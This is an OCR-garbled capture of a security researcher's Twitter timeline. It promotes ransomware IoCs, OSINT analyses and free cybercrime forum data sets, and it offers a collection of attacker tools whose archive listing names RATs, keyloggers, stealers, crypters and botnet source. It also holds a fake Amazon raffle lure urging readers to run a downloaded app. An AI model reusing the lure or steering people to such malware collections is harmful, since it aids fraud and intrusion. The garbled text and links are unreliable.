Stats: 266 files “size 3.75 GBD, vead speed 27.4 MB/sec Ccompression 


ratio 99%>,. upload 25.@ MB/sec 
36 


Stats: 3 files <size 5.36 GB>. vead speed 27.4 MB/sec ‘compression 
ratio 99%>, upload 25.6 MB/sec 


00:56 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/niEBmDr89F 
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Amazon 30th Anniversary Celebration 


Amazon's 30th Anniversary Celebration is coming to an end. 
Today is the last stage of the raffle for a USD 10-200 gift card and other prizes 
To participate in the raffle, you need to download the Lottery App and generate a unique code 


Our system will automatically select the winners and send gifts to your email address within a few days after applying for participation 


How to take part in the raffle? 
1. Download the application 
2. Run the application, The application will generate a code to participate in the lottery 


3. Enter the code in the text field below 
00:56 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5clc7 Front Page here - https://t.co/OmUajqR2uy 
Awesome! Research here - https://t.co/YLxOufOjWV Awesome! 
https://t.co/Hq6ikEOdyg 


@ Apple 


Hello! 
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Conti Ransomware Gang loCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! 
https://t.co/ulGWaxgnWz 


00:57 


Conti Ransomware Gang loCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! 
https://t.co/O3pvyo4LkH 
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AO HOSOFO YrosHe 
SCITO: 4 


CnMCOK YXAXKMBAHMA 


KOMMEHTAPHMN 


@) BBEAMUTE COOBLIEHHE... @ 


00:58 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/x1CsKOUYIf 
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05:51 


Folks. I’m hosting a live Q&amp;A - https://t.co/GOYJoEe1xS Ask your questions! 
Enjoy! - https://t.co//TcqOaYOur #security #cybercrime #malware #ThreatHunting 
#threatintelligence #threatintel https://t.co/FHCc1ghgkjF 


22 *1 
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‘v] 


:= Where do you know Dancho Danchev from? 12 


g 


O Dancho Danchev's Blog - Mind Streams of Information Security Knowledge 
O Astalavista.com (2003-2006) 

© Zonet's Zero Day Blog 

O Webroot's Threat Blog 

O The Koobface Botnet 

O Just a very good friend who | admire 

© invite-only Conference Held in 2010 

© RSA Europe 2012 


O InfoSec 2012 


07:28 


My setup for today. Pretty portable but I’m fine. FortiMail and FortiSandbox in place. 
Keep all the spam and malware coming and see the results at https://t.co/JTcqObfRwr 
Enjoy! https://t.co/uAvOn3DZFI 
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10 - Monday 


19:21 


"A Brief Overview of Disruptive Individual’s Methodology for Processing Distributing 
Disseminating and Responding to Cyber Threat Incidents - An Analysis" - 
https://t.co/xRgsfmgLhZ Front page: https://t.co/OmUajr9bIG #Threatintel 

#Threatintelligence 


19:22 


"Introduction to Disruptive Individual’s Response to the Conti Ransomware Gang’s 
Internet-Connected Infrastructure - Check Out the Take Down Efforts!" - 
https://t.co/TYV2P3Hfugq Front page: https://t.co/OmUajr9bIG #Threatintel 
#Threatintelligence 


19:24 


Conti #ransomware gang IoCs (Indicators of Compromise) in STIX2/TAXII here - 
https://t.co/m49Cs5uuqf 562 pages report here - https://t.co/BOQKpDCB2K Original 
post: https://t.co/TYV2P3Hfugq Front page: https://t.co/OmUajr9bIG #Threatintel 
#Threatintelligence 


23 
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12 - Wednesday 


03:57 


:) #Threatintelligence https://t.co/SrcymK3s6r 


04:38 
God Bless the United States of America. https://t.co/U2fsoGQcLA 
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www.BANDICAM .com 


14 - Friday 


04:57 


My Google Knowledge Panel. https://t.co/vgkBxFD9Ko https://t.co/BwLlumcbav 


*1 
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Dancho Danchev 


Researcher 


Dancho Danchev is an independent security consultant and 
cyber threats analyst, with extensive experience in open 
source intelligence gathering, and cybercrime incident 
response. 


© _https://cybernews.com > danchod 


j ri¢ i63\/ i () 1 | Vi : 
LZUPIWViIUV, FPAULIIVI AL WYO 


05:21 
My latest interview online - https://t.co/39JWq7VGBL 


15 - Saturday 


11:44 


| just checked my followers. I’m in a very good company. Tnx for the follow. @curtw 
@kevtownsend @MishaGlenny @threatresearch @sergiohernando @dragosr 
@Jeremy_Kirk @JamzYaneza @lennyzeltser @jimmychappell @jcanto @Wh1t3Rabbit 
@stiennon @securityaffairs @J3rge 
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16 - Sunday 


03:52 
Who wants or needs access to my 64GB Cybercrime Forum Data Set for research and 
situational awareness purposes? | also have a second 3GB compilation of tools of the 
trade courtesy of the bad guys. Drop me a line at dancho.danchev@hush.com 
https://t.co/jF2QHb6H82Q 
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= 


CYBERCRIM 


—_— 


FORUM DATA 
SET 2091 


OVER 111] FULL OFFLINE CODIES 


(19GB) OF PUBLICLY 
ACCESSIBLE CYBERCRIME 
FORUM COMMUNITIES. FREE TO 
DOWNLOAD FOR PROCESSING 
AND ENRICHMENT. 


APPROACH ME AT 
DANCHO.DANCHEV@HUSH IN ORDER 
TO OBTAIN A FREE COPY! 


03:53 


Who wants or needs access to my 64GB Cybercrime Forum Data Set for research and 
situational awareness purposes? | also have a second 3GB compilation of tools of the 
trade courtesy of the bad guys. Drop me a line at dancho.danchev@hush.com 
https://t.co/ewdQOQweE0 
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|_| carders.ws 784,042,156 


| | erdpro.ce 148,931,414 
| erdclub.su 284,760,267 
www.verifiedcarder.net 195,361,865 
_ erderew.ce 306,058,036 
(i cccc.ug 204,942,134 
__. deeptor.ws 118,800,907 
_ darknetforum.su 158,093,539 
__ legitcarders.ws 84,597,394 
a cybercarders.su 53,971,014 
ia darkpro.net 61,534,546 
i shadowcarders.com 46,726,130 
__ darknet.cx 33,131,898 
fa blacknetworld.com 25,444,394 
fal darknetpro.net 21,517,653 
fa verifiedcarders.net 9 168,624 
P| underworldmafias.net 18,669,482 
18:18 


Subscribe! - https://t.co/7GM1oNfgvi #security #cybercrime #malware 
#CybersecurityAwarenessMonth #cybersecuritytips #CyberSecurityAwareness 
#threathunting #threatintelligence #threatintel 


21 %1 


17 - Monday 


06:10 
Subscribe! https://t.co/HUEVNbuGr5 https://t.co/RmMUrMChucU 
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18 - Tuesday 
01:37 


01:37 


01:37 


01:38 
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DANCHO DANCHEV'S OFFENSIVE 
WARFARE 2.0 - THE WEB'S 
PRIMARY CYBERCRIME 
RESEARCH OSINT AND THREAT 
INTELLIGENCE CENTRAL 
CLEARING HOUSE 


Dancho Danchev is the world's leading expert in the field 
of cybercrime fighting and threat intelligence gathering 
having actively pioneered his own methodlogy for 
processing threat intelligence leading to a successful set 
of hundreas of high-quality anaysis and research articles 
published at the industry's leading threat intelligence blog 
— ZDNet's Zero Day, Dancho Danchev's Mind Streams of 
Information Security Knowledge and Webroot's Threat 
Blog with his research featured in Techmeme, ZDNet, 
CNN, PCWorld, SCMagazine, TheRegister, NYTimes, CNET, 
ComputerWorld, H+Magazine currently producing threat 
intelligence at the industry's leading threat intelligence 
blog — Dancho Danchev's — Mind Streams of Information 
Security Knowledge. With his research featured at RSA 
Europe, CyberCamp, InfoSec, GCHQ and Interpol the 
researcher continues to actively produce threat 
intelligence at the industry's leading threat intelligence 
blog — Dancho Danchev's — Mind Streams of Information 
Security Knowledge publishing a diverse set of hundreds 
of high-quality research analysis detailing the malicious 
and fraudulent activities at nation-state and malicious 
actors across the globe. 


https://t.co/mjzvh5Rr66 


https://t.co/A9ePkoVIrN 


https://t.co/QCnBUhX3pq 


https://t.co/SR5ivFLSi) 


01:38 


01:38 


01:38 


01:38 


01:38 


01:38 


01:38 


01:39 


01:39 


01:39 


01:39 


01:39 


01:40 


01:40 


01:40 


https://t.co/8e7ZfeQuZG 


https://t.co/o3aOKOiaZd 


https://t.co/bRO5Z5bhlia 


https://t.co/2UDbwyF5jn 


https://t.co/slcASbQbbO 


https://t.co/wXFbS2zKdz 


https://t.co/AgPUHBxrQP 


https://t.co/YflzI56DE7 


https://t.co/TFclErw49u 


https://t.co/RsI3LdAZV9 


https://t.co/KoMDwB5Mal 


https://t.co/CjHLJ33whd 


https://t.co/7UL57KA6GI 


https://t.co/ZyzrVhkolW 


https://t.co/FbyzPLBql0O 


1055 


01:40 
https://t.co/uLPOhrAbTH 


01:50 
https://t.co/52kKUxvHZGP 


21 - Friday 


13:49 
Introducing Dancho Danchev’s 265GB "Cybercrime Research and Cybercrime 
Fighting” Torrent. Original post here - https://t.co/QCrwht6UKH Direct download link - 
https://t.co/ST3B5eZShu Second direct download link - https://t.co/dWEQmdrMJv RT 
pls! Enjoy! 


21 *%3 
13:50 
Original post here - https://t.co/QCrwhtnXmH Direct download link - 
https://t.co/ST3B5fgVju Second direct download link - https://t.co/dWEQmd9Dvn RT 
pls! Enjoy! #security #cybercrime #malware #CyberSecurity 
#CybersecurityAwarenessMonth https://t.co/SSFh6cwpFw 


2 


13:57 


https://t.co/8mZuSzwZi4 #security #cybercrime #malware #CyberSecurity 
#CybersecurityAwarenessMonth #CyberSecurityAwareness #cybersecuritytips 
#cyberattacks #threatreport 
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22:30 


Some big news announcements. Did you grab my 265GB cybercrime research 
torrent? - https://t.co/dWEQmdrM}Jv it seems that I’m somehow leading the loCs 
production and dissemination game online which is great news. Stay tuned! 


22:30 


Cheers to @netresec who presented at @FIRSTdotOrg - https://t.co/dHe4VJMCQN on 
the SolarWinds Supply Chain Compromise and mentioned me in his presentation. 
Stay tuned! https://t.co/vwC5jT7opQ 


Thanks to Everyone who Contributed with pDNS! 


Joe Slowik " eke Rohit Bansal 


22:31 


It seems that | also made it into this research - "Acing the IOC Game: Toward 
Automatic Discovery and Analysis of Open-Source Cyber Threat Intelligence” - 
https://t.co/S5HorVlebal - which is outstanding news and I’m flattered. Stay tuned! 
https://t.co/9TPNI5fE77 


5.3. Understanding Intelligence Sources 

The availability of the longitudinal data (the IOCs collected over 
a span of 13 years) also enables us to investigate the qualities of 
the indicators produced by different sources and their timeliness 
against new threats, as reported below. 


Timeliness. Using the aforementioned attack clusters (see Table 7), 
we analyzed the distribution of the articles first reporting the at- 
tacks over different blogs, as shown in Figure 8b. We found that 10 
blogs were responsible for the first report of 60% the clusters (each 
cluster likely to be a campaign). For example, the blog Dancho 
Danchey first report 12 clusters, each time involving 45 IOCs on 
average, Which later also showed up on other blogs. 


22:32 


| also made it into this "Competitors" slide courtesy of @jeffreycarr. Big thanks and 
I’m flattered. Stay tuned! https://t.co/oJNJfHZ9I) 
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22:33 


® Identified Competitors 
* Cyber Defense Agency (CDA) 
(US) 
« Cyber Security Research and 
Development Center (US) 
» Cyveillance (US) 
« Dancho Danchev (EU) 


> Department of Homeland 
Security US-CERT(US) 


* Ernst & Young (EU) 

» EWA Information and 
Infrastructure Technologies, Inc 
(US) 

« Fortify (US) 

« Global Security Mag (EU) 


Competitors 


* iDefense Labs (US) 

» UET Intelligent Risk Systems (US) 
* Informatica (US) 

» 1T—Information Sharing and 


Analysis Center (US) 


* iSIGHT Partners (US) 
* Lookingglass (US) 
« Multi-State Information Sharing 


Analysis Center (US) 


* nCircle (US) 

*« SecureWorks (US) 

« Trend Micro (US) 

* United States Cyber 


Consequence Unit (US) 


I’m also dominating the "GoodFATR" - https://t.co/Ueu2UznFKp loCs research project 
with research and analysis which is great news. Thanks a lot and | promise to keep 
the rhythm of production and dissemination of loCs and cyber attack analysis going. 
https://t.co/KCgrqsvDSO 


22:34 


in the origins. Surprisingly, the top contributor is the personal blog 
from Dancho Danchev, followed by two Medium blogs that aggre- 
gate blockchain and cybersecurity news. The RSS top-10 is rounded 
by the research labs of three large companies (Cisco, F5, Malware- 
bytes), two other personal blogs (Bruce Schneier, contagiodump), 
and two magazines (Cointelegraph.com and BleepingComputer). 
Interestingly, two of the RSS top 10 origins focus on blockchain. We 


I’m also listed in @ThreatConnect’s - "CAL Automated Threat Library (ATL) Supported 
Blogs" - https://t.co/nTO4elINvkm. Here’s my RSS feed - https://t.co/X13e76nFj7 Stay 
tuned! https://t.co/keWh6x0YiY 
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Dancho Danchev's Blog 


23 - Sunday 


03:00 


My RSS feed - https://t.co/X13e76nFj7 #security #cybercrime #malware 
https://t.co/LeOixgtol7 


in the origins. Surprisingly, the top contributor is the personal blog 
from Dancho Danchev, followed by two Medium blogs that aggre- 
gate blockchain and cybersecurity news. The RSS top-10 is rounded 
by the research labs of three large companies (Cisco, F5, Malware- 
bytes), two other personal blogs (Bruce Schneier, contagiodump), 
and two magazines (Cointelegraph.com and BleepingComputer). 
Interestingly, two of the RSS top 10 origins focus on blockchain. We 


22:55 


Ha 8-mu HoemsBpu we npaBa npe3seHTaunWaA Ha Cyber Security Talks Bulgaria - 
https://t.co/oQGWQzqDF) noxenaute mu ycnex! No3sgpasu. Danuyo. 
https://t.co/l6srhyegmb 


20:25 - An Introduction to the World of Cybercrime OSINT and Threat Intelligence Gathering 


2 ~ £4.42 


- 190-50 
Lb ee be) 


24 - Monday 


17:04 


Subscribe! - https://t.co/7GM1oNwjxi #security #cybercrime #malware #CyberAttack 
#CyberSecurity #CybersecurityAwarenessMonth #cybersecuritytips #cyberattacks 
#ThreatHunting #threatintelligence #threatintel https://t.co/QiyVUGLIkF 
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Dancho Danchev's Newsletter 


Cybercrime OSINT Security Blogging Threat 
intelligence Cyber Warfare Information and 
Asymmetric Warfare Exposed 


Launched 7 months ago 


Type your email... } subscribe 


Let me read it first > 


25 - Tuesday 


00:11 


Exposing a Compilation of Known Locky Ransomware Themed BitCoin Addresses - An 
OSINT Analysis - Part Three on Dancho Danchev’s Newsletter 
https://t.co/tOZDZMO05vg 


00:11 


Exposing a Compilation of Known Locky Ransomware Themed BitCoin Addresses - An 
OSINT Analysis - Part Two on Dancho Danchev’s Newsletter https://t.co/3 7U9MRJrjZ 


00:11 


Exposing a Compilation of Known Locky Ransomware Themed BitCoin Addresses - An 
OSINT Analysis - Part Four on Dancho Danchev’s Newsletter https://t.co/SolubTOr)W 


00:12 


Exposing a Compilation of Known Locky Ransomware Themed BitCoin Addresses - An 
OSINT Analysis - Part Five on Dancho Danchev’s Newsletter https://t.co/n39Eg7keAf 


00:12 
Exposing a Compilation of Known Locky Ransomware Themed BitCoin Addresses - An 
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OSINT Analysis - Part Six on Dancho Danchev’s Newsletter https://t.co/72VPFWBLXo 


00:14 

A Compilation of 20,000 Known Ransomware BitCoin Transaction IDs and BitCoin 
Addresses - An OSINT Analysis on Dancho Danchev’s Newsletter https://t.co/JjGAFFs]3| 
00:14 


A Compilation of 20,000 Known Ransomware BitCoin Transaction IDs and BitCoin 
Addresses - An OSINT Analysis - Part Two on Dancho Danchev’s Newsletter 
https://t.co/vE4tLikmjS 
00:14 


A Compilation of 20,000 Known Ransomware BitCoin Transaction IDs and BitCoin 
Addresses - An OSINT Analysis - Part Three on Dancho Danchev’s Newsletter 
https://t.co/O8TWFWOZYn 
00:15 


A Compilation of 20,000 Known Ransomware BitCoin Transaction IDs and BitCoin 
Addresses - An OSINT Analysis - Part Four on Dancho Danchev’s Newsletter 
https://t.co/dsl1hQacNOi 
00:15 


A Compilation of 20,000 Known Ransomware BitCoin Transaction IDs and BitCoin 
Addresses - An OSINT Analysis - Part Five on Dancho Danchev’s Newsletter 
https://t.co/IQtfyuFH2a 
14:01 


Exposing a Compilation of 20,000 Ransomware Themed BitCoin Transaction IDs and 
BitCoin Addresses - An OSINT Analysis https://t.co/GqxVZKYJU3 


*1 

14:01 

Exposing a Compilation of 20,000 Ransomware Themed BitCoin Transaction IDs and 
BitCoin Addresses - An OSINT Analysis - Part Four https://t.co/G7gb3fkdnm 

*1 

14:01 


Exposing a Compilation of 20,000 Ransomware Themed BitCoin Transaction IDs and 
BitCoin Addresses - An OSINT Analysis - Part Three https://t.co/TbAIWi4eHI 


14:01 


Exposing a Compilation of 20,000 Ransomware Themed BitCoin Transaction IDs and 
BitCoin Addresses - An OSINT Analysis - Part Two https://t.co/JcpAlwWL9Aa 


14:01 


Exposing a Compilation of 20,000 Ransomware Themed BitCoin Transaction IDs and 
BitCoin Addresses - An OSINT Analysis - Part Five https://t.co/7WxwLO8fBH 
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22:35 
My New RSS Feed https://t.co/CIMgETHf7R 


22:35 


Dancho Danchev - The Re-Surrection - 2022 - Official Come Back Or a "Brief History 
Into the World of Hacking Security Blogging OSINT and Threat Intelligence Gathering" 
- A Guide To The Scene https://t.co/uysl6cVdUp 


22:35 


How to Build an Information Security Industry "At Home" - The Definite Manual - An 
Analysis https://t.co/wGY60lOGHH 


22:35 


Inside the KillNet Crowd-Sourced DDoS Attack Campaign Targeting International Web 
Sites - An OSINT Analysis https://t.co/vMVPpY8G83 


26 - Wednesday 


03:03 
Cyber Intelligence - Personal Memoir - Grab a Copy Today! https://t.co/Z7qgphYizr 
03:03 


People’s Information Warfare vs the U.S DoD Cyber Warfare Doctrine - An Analysis 
https://t.co/DwSpcLrRGG 


03:03 


Exposing a Compilation of Money Mule Recruitment Related Screenshots - An OSINT 
Analysis https://t.co/ZnP1qO0jGmL 


08:54 
The Most Wanted Cyber Jihadist - An Analysis https://t.co/cynQQDjSGM 
08:54 
Leadership Basics - An Analysis https://t.co/qCuHaHdkjo 
08:54 


A Pragmatic Cyberwarfare Doctrine - What Money Cannot Buy - An Analysis 
https://t.co/1fGoTyjYLI 


09:20 


Should a Country Physically Bomb the Source of the Cyber Attack? - An Analysis 
https://t.co/ZBmhtsLnQu 


09:20 
Ten Signs It’s a Slow News Week - An Analysis https://t.co/SixJcspIsL 
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09:20 
Bureaucratic Warfare Against Unrestricted Warfare - An Analysis 
https://t.co/G3ejxXco07 
09:20 
The U.S is Facing a Cyber Warfare Doctrine Crisis - An Analysis 
https://t.co/38rkqXAzHb 
09:20 
Spotting Moguls - An Analysis https://t.co/tTTok8PrFd 


27 - Thursday 


00:47 
My New RSS Feed - Part Two https://t.co/zlybHds5Si 


*2 
00:47 


Exposing "Emennet Pasargad/Eeleyanet Gostar/Net Peygard Samavat" Iran-Based 
Company on FBI’s Most Wanted Cybercriminals List - An OSINT Analysis 
https://t.co/Twa2RIPtly 


07:38 


Who DDoS-ed Georgia/Bobbear.co.uk and a Multitude of Russian Homosexual Sites in 
2009? - An OSINT Analysis https://t.co/cxc40EX3Sw 


10:05 

Exposing a Compilation of Botnets-in-the-Wild Screenshots - An Analysis 

https://t.co/Oucw5whT9D 
28 - Friday 
00:14 
CAPTCHA is Dead! - Here’s the Proof https://t.co/x4lq6E4B4U 

*1 
00:14 

Mobile Malware - Hype or Threat? - An Analysis https://t.co/4AlxiFaVO1 
03:46 


Exposing a Portfolio of YaBucks Pay Per Install Affiliate Network Scareware Serving 
Domains - An Analysis https://t.co/OYBzBT0oZt 
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16:00 


Exposing a Compilation of Stolen Credit Cards Selling Domains - An Analysis 
https://t.co/g16DqqDe9h 


*1 
18:20 


Exposing A E-Shop for Selling Access to Compromised PCs - An Analysis 
https://t.co/34faTrEG87 


29 - Saturday 


10:07 


From the LOL - "Laughing Out Loud" - Department! Cheers and happy weekend 
everyone! - https://t.co/JTcqOaYgET Full video here - https://t.co/Uf20e06cgi 
#Threatintel #threatintelligence https://t.co/neP8qdju78 


2 2 


EROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
Host: Dancho Danchev 
Position: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 
Email: dancho.danchev@hush.com 


10:13 


Thank You For Following Me! https://t.co/jS5maElcUqG 


22:34 


Good Morning Europe. Today’s walk. Beginning to record these. Meanwhile grab the 
265GB torrent - https://t.co/8mZuSzwrsw Cheers! https://t.co/EDxgNOXji2 


*1 
1064 


30 - Sunday 


19:18 


Accepting Guest Bloggers on cybercrime security blogging OSINT and threat 
intelligence including anything information security related at https://t.co/JTcqOaYgET 
Send an email at dancho.danchev@hush.com to discuss! #ThreatIntelligence 
#ThreatHunting https://t.co/FsrLYZVTAT 
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FIREBUG 


RSS Edit 


Summarizing A Portfolio Of Recently 
Released WhoisXML API Threat Research 
Reports Courtesy Of Me - An Analysis 


21:20 
Who wants to become Guest Blogger at https://t.co/JTcqOaYgET? 


21:29 


Dancho Danchev InFraud Organization - YouTube Maltego Demonstration - An 
Analysis https://t.co/6éhwr3LwmtM 


21:29 
Dancho Danchev’s Vlog - Psychedelic Reality Session - YouTube Video - An Analysis 
https://t.co/jLbaq20q3E 
21:29 


Dancho Danchev - Official Come Back - YouTube Video - An Analysis 
https://t.co/hO)XIwbHjs 


21:29 


Dancho Danchev SecondEye Solutions - YouTube Maltego Demonstration - An 
Analysis https://t.co/IBIBNInNUKL 


21:29 


Do You Want to Become Guest Blogger or Post a Guest Post Here? 
https://t.co/C68BNvOmFnq 


23:09 


I’m offering exclusive access to my Cybercrime Forum Data Set for 2021. Interested? 
Drop me a line at dancho.danchev@hush.com and I'll send you the direct download 
links. https://t.co/nO9x2xRvGj 
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FORUM DATA 
SET 2021 


OVER 11] FULL OFFLINE COPIES 


(19GB) OF PUBLICLY 
ACCESSIBLE CYBERCRIME 
FORUM COMMUNITIES. FREE TO 
DOWNLOAD FOR PROCESSING 
AND ENRICHMENT. 


APPROACH ME AT 
DANCHO.DANCHEV@HUSH IN ORDER 
TO OBTAIN A FREE COPY! 


23:09 


I’m offering exclusive access to my Cybercrime Forum Data Set for 2021. Interested? 
Drop me a line at dancho.danchev@hush.com and I'll send you the direct download 
links. https://t.co/wPuttuW47n 


*4 
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g HacPack_01 


Compressed (zipped) Fol. 


730,598 KB 


[=] Archive_01 PowerlSO RAR File 655,805 KB 
[1] Tools PowerlSO RAR File 259,264 KB 
OF) HackPack PowerlSO RAR File 175,814 KB 
[| Malicious_Software_RATs_Cybercri.. PowerlSO RAR File 66,073 KB 
(E) Tools_01 PowerlSO RAR File 138,313 KB 
[| Sources-delphi_crypters_packers_r... PowerlSO RAR File 135,925 KB 
[®) Stealer Pack DarkCoderl4 PowerlSO RAR File 108,583 KB 
(| Bots-2 PowerlSO RAR File 83,852 KB 
(F) spam_tools PowerlSO RAR File 69,338 KB 
1) spamming_tools PowerlSO RAR File 69,338 KB 
(F) BotNet.Source.Codes PowerlSO RAR File 68,373 KB 
F) Malicious_Software_RATs_Keylogge... PowerlSO RAR File 68,199 KB 
(©) Ashiyane_Security_Team_Group_H... PowerlSO RAR File 59.751 KB 
(=) Malicious _Software_Keyloggers_Cr... PowerlSO RAR File 56,337 KB 
1) TDoS_Attack Tools Compilation PowerlSO RAR File 23,822 KB 
(| botnet-ddos PowerlSO RAR File 12,227 KB 
[®) Malware_Crypters Source_Code PowerlSO RAR File 9944 KB 
[| Malware_Crypters Source Code_01 PowerlSO RAR File 6,371 KB 
(F] Stealer PowerlSO RAR File 4,657 KB 
[| Mujahedeen_ Secrets Encryption_T... PowerlSO RAR File 3,161 KB 
(®) RazStealer 2 Cracked PowerlSO RAR File 28 KB 


31 - Monday 


01:07 


01:07 


A Peek Inside a Russian Web-Based Managed Spam Service - An Analysis 


https://t.co/5zYo99NVyP 


Profiling a Russia-Based Bulletproof Hosting Provider - An Analysis 


https://t.co/ISKCOEF3Pn 


02:32 


A Peek Inside the Earnings4u Managed Malware Distribution Service - An Analysis 
https://t.co/cMBis6YUNs 


05:01 


Thanks to everyone on Twitter who requested access to my Cybercrime Forum Data 
Set for 2021 which is 67GB. The offer is still valid. Drop me a line at 
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dancho.danchev@hush.com and | would be happy to offer access and direct 
download links. Enjoy! #threatintel https://t.co/Vf6Xc8D0zi 


1 
FORUM DATA 
SET 2021 


OVER Ill FULL OFFLINE COPIES 


(19GB) OF PUBLICLY 
ACCESSIBLE CYBERCRIME 
FORUM COMMUNITIES. FREE TO 
DOWNLOAD FOR PROCESSING 
AND ENRICHMENT. 


APPROACH ME AT 
DANCHO.DANCHEV@HUSH IN ORDER 
TO OBTAIN A FREE COPY! 


05:03 


| also have a second compilation which is 3GB of hacking tools coming straight from 
the source - the bad guys which | would be willing to share for research purposes as 
well. Drop me a line at dancho.danchev@hush.com in case you’re interested. 
#threatintel https://t.co/YomFcuX320 
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a HacPack_01 


Compressed (zipped) Fol.. 


730,598 KB 


TE) Archive_01 PowerlSO RAR File 655,805 KB 
[§) Tools PowerlSO RAR File 259,264 KB 
(F) HackPack PowerlSO RAR File 175,814 KB 
[| Malicious_Software_RATs_Cybercri.. PowerlSO RAR File 166,073 KB 
[) Tools_01 PowerlSO RAR File 138,313 KB 
[®] Sources-delphi_crypters_packers_r...  PowerlSO RAR File 135,925 KB 


[#) Stealer Pack DarkCoderl4 PowerlSO RAR File 108,583 KB 
(| Bots-2 PowerlSO RAR File 83,852 KB 
(®) spam_tools PowerlSO RAR File 69,338 KB 
1) spamming_tools PowerlSO RAR File 69,338 KB 
(®) BotNet.Source.Codes PowerlSO RAR File 68,373 KB 
1) Malicious_Software_RATs_Keylogge... PowerlSO RAR File 68,199 KB 
(&) Ashiyane_Security_Team_Group_H... PowerlSO RAR File 59,751 KB 
[=| Malicious _Software_Keyloggers_Cr... PowerlSO RAR File 56,337 KB 
[) TDoS_Attack_Tools_Compilation PowerlSO RAR File 23,822 KB 
(1) botnet-ddos PowerlSO RAR File 12,227 KB 
[| Malware_Crypters_Source_Code PowerlSO RAR File 9.944 KB 
(| Malware_Crypters Source_Code_01 PowerlSO RAR File 6,371 KB 
(F) Stealer PowerlSO RAR File 4,657 KB 
[| Mujahedeen_ Secrets Encryption_T... PowerlSO RAR File 3161 KB 
() RazStealer 2 Cracked PowerlSO RAR File 28 KB 

November 

1 - Tuesday 

02:54 


Yanluowang’s Ransomware Group’s Internal Communications Leaked by Russian 
Threat Actors - An Analysis https://t.co/9yILxpHa4a 


18:40 


Exposing a Chinese Web Site Defacement Attack Campaign Against Iran-based Web 
Sites - An Analysis https://t.co/wEhF3hQ4Hc 


18:40 


Exposing a Publicly Accessible CAPTCHA-Solving Service - An Analysis 
https://t.co/sSkA9Zfikdv 


1070 


18:40 


Exposing Recently Leaked Cybercrime-Friendly Forum Community Screenshots - An 
Analysis https://t.co/dnwh6Zn703 


18:40 
Exposing BBC’s Chimera DDoS Botnet - An Analysis https://t.co/UxzxnsWUXI 


18:40 


Exposing a SQL Injection Capable IRC Malware Bot - An Analysis 
https://t.co/qkKSdxjlHbk 


19:03 


Exposing a Malware Serving Client-Side Exploits Serving Campaign at CNET’s 
https://t.co/owEkodRbpk Abusing Input Validation Flaws - An Analysis 
https://t.co/d20o0qlajuA 


19:35 


Exposing a Sample Russia-Based Managed Web-Based Spam Service - An Analysis 
https://t.co/zJCRXPhJus 


19:35 

Exposing Sample Screenshots Courtesy of the Yes Web Malware Exploitation Kit - An 
Analysis https://t.co/RhvntiB2J8 

*1 

20:13 


Do you want to become Guest Blogger at https://t.co/JTcqOaYgET #security 
#cybercrime #malware #Threatintelligence #ThreatHunting drop me a line at 
dancho.danchev@hush.com 


21 %1 


2 - Wednesday 


07:20 
XTO xoyve O6yTV 3anpolweHuM 6NorepomM Ha Libomy 603i? https://t.co/ca53FntpzT 


07:20 

Kim bu blogda konuk blog yazari olmak ister? https://t.co/V8CeVdheS} 
07:20 

Vem vill bli gastbloggare pa den har bloggen? https://t.co/qMLI6ndgLV 
07:20 


éQuién quiere ser bloguero invitado en este blog? https://t.co/QkFuY2WgHQ 
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07:20 
Who Wants to Become a Guest Blogger At This Blog? https://t.co/tVL5MaqMLi 


08:26 


https://t.co/oQGWQzq5Qb - 6narogapa Ha @PavelGeorgiev20 3a noKaHata. LLle ce 
BUQUM Ha 8-mMu HoemBpu! NMo3gpasu. Januo. https://t.co/vs8tj70t30 


OT ObnrapcKka cTpaHa yyYacTuve We B3emMe JlaHYyo 


Dianyes — Bofeu CBeETOBeH eKCNepT B OONacTTa Ha 
op6aTa c KUOepnpecTbnHoctta, U3BeECTeH Ole KATO 
»bbnrrapcKuat Ku6ep-Xonmc". 


21:34 


The Deepest of Them All - A Profile of Yavor Kolev - a Bulgarian Law Enforcement 
Officer Kidnapper and a Bulgarian Dipshit - An Analysis https://t.co/kEelyC9v4L 


3 - Thursday 


01:13 


Joseph Mlodzianowski Joining Dancho Danchev’s Blog as Guest Blogger - Stay tuned! 
https://t.co/aEQ8AE9yLc 


01:31 
Today’s walk. https://t.co/3m6RSHOFrk 
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01:40 


Exposing a Sample Rock Phish Phishing Campaign’s Botnet Hosted Infrastructure - An 
Analysis https://t.co/VjPLerrFM6 


01:40 


Profiling a Sample Scareware Serving Keywords Analysis Twitter Campaign - An 
Analysis https://t.co/1OUjjrT6JE 


01:40 


Exposing a Rogue Google AdSense Campaign Using Typosquatted Malware Serving 
Software Releases - An Analysis https://t.co/YQBFYwkWX0 


09:40 


Profiling a Email Password Harvesting Enabled Malicious Software Release - An 
Analysis https://t.co/alDxV64YFI 


09:40 


Exposing a Russia-Based Stolen and Compromised Credit Cards Checking Web Site - 
An Analysis https://t.co/1tE9Aej0aH 


10:35 
Profiling the ZeusEsta Managed ZeuS Crimeware Hosting Service - An Analysis 
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https://t.co/nFWtlyNSUM 


11:53 
Profiling the Limbo Crimeware Malicious Software Release - An Analysis 
https://t.co/2MjzWWFvQ8 
4 - Friday 
14:44 


Who has a valid Maltego License and wants to work on a Collaborative Graph with 
me? Post a comment or send me an email at dancho.danchev@hush.com can your 
please RT? Thanks! #security #cybercrime #malware #ThreatHunting 
#Threatintelligence #threatintel https://t.co/6Vk9siFGol 


27 *5 
= = = 
21:47 
@MarioRojasChin Hey Mario. Just replied. Regards. Dancho 
5 - Saturday 
08:50 


